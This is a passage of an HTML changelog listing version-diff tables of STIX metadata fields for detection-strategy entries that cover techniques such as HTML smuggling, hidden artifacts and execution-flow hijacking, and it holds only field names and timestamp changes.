collapse;'>2026-05-12 16:34:50.676000+00:00</td></tr></tbody></table></details><hr><h4>[DET0313] Detection Strategy for HTML Smuggling via JavaScript Blob + Dynamic File Drop</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.687000+00:00</td></tr></tbody></table></details><hr><h4>[DET0502] Detection Strategy for Hidden Artifacts Across Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.690000+00:00</td></tr></tbody></table></details><hr><h4>[DET0461] Detection Strategy for Hidden File System Abuse</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.683000+00:00</td></tr></tbody></table></details><hr><h4>[DET0032] Detection Strategy for Hidden Files and Directories</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.675000+00:00</td></tr></tbody></table></details><hr><h4>[DET0353] Detection Strategy for Hidden User Accounts</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.692000+00:00</td></tr></tbody></table></details><hr><h4>[DET0321] Detection Strategy for Hidden Virtual Instance Execution</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.677000+00:00</td></tr></tbody></table></details><hr><h4>[DET0128] Detection Strategy for Hidden Windows</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.669000+00:00</td></tr></tbody></table></details><hr><h4>[DET0411] Detection Strategy for Hide Infrastructure</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.690000+00:00</td></tr></tbody></table></details><hr><h4>[DET0218] Detection Strategy for Hijack Execution Flow across OS platforms.</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.667000+00:00</td></tr></tbody></table></details><hr><h4>[DET0201] Detection Strategy for Hijack Execution Flow for DLLs</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.690000+00:00</td></tr></tbody></table></details><hr><h4>[DET0064] Detection Strategy for Hijack Execution Flow through Path Interception by Unquoted Path</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.672000+00:00</td></tr></tbody></table></details><hr><h4>[DET0427] Detection Strategy for Hijack Execution Flow through Service Registry Premission Weakness.</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.686000+00:00</td></tr></tbody></table></details><hr><h4>[DET0436] Detection Strategy for Hijack Execution Flow through Services File Permissions Weakness.</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.682000+00:00</td></tr></tbody></table></details><hr><h4>[DET0517] Detection Strategy for Hijack Execution Flow through the AppDomainManager on Windows.</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.674000+00:00</td></tr></tbody></table></details><hr><h4>[DET0577] Detection Strategy for Hijack Execution Flow through the KernelCallbackTable on Windows.</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.682000+00:00</td></tr></tbody></table></details><hr><h4>[DET0038] Detection Strategy for Hijack Execution Flow using Executable Installer File Permissions Weakness</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: 